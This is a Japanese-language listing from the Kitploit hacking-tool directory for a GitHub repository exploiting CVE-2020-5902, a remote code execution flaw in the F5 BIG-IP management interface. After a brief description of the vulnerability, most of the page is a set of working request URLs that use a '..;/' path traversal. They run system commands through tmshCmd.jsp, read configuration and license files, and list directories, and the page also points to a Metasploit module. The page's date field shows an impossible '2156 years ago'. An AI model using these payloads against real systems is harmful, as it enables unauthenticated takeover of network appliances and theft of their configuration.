Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-5902 — [CVE-2020-5902] F5 BIG-IP リモートコード実行 (RCE) | Kitploit
ツール/GitHubGitHub/murataydemir/cve-2020-5902
エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmurataydemir/cve-2020-5902

CVE-2020-5902

[CVE-2020-5902] F5 BIG-IP リモートコード実行 (RCE)

リポジトリを見る
2156年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

[CVE-2020-5902] F5 BIG-IP Traffic Management User Interface (TMUI) リモートコード実行


BIG-IP バージョン 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, 11.6.1-11.6.5.1 において、Traffic Management User Interface (TMUI) (別名 Configuration utility) の未公開ページにリモートコード実行 (RCE) の脆弱性が存在します。

この脆弱性により、認証されていない攻撃者、または認証されたユーザーが、BIG-IP 管理ポートおよび/またはセルフ IP を介して Configuration utility にネットワークアクセスすることで、任意のシステムコマンドの実行、ファイルの作成/削除、サービスの無効化、および/または任意の Java コードの実行が可能になります。この脆弱性はシステム全体の侵害につながる可能性があります。アプライアンスモードの BIG-IP システムも影響を受けます。この問題はデータプレーンには公開されておらず、コントロールプレーンのみに影響します。

root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/

F5 によって公開された元のセキュリティ勧告は こちら からご確認いただけます。
また、CVE-2020-5902 向けのメタスプラウトモジュールが Excellent ランキングで利用可能です。メタスプラウトモジュールの Ruby コードは exploits/linux/http/f5_bigip_tmui_rce.rb で確認できます。

ツールをダウンロード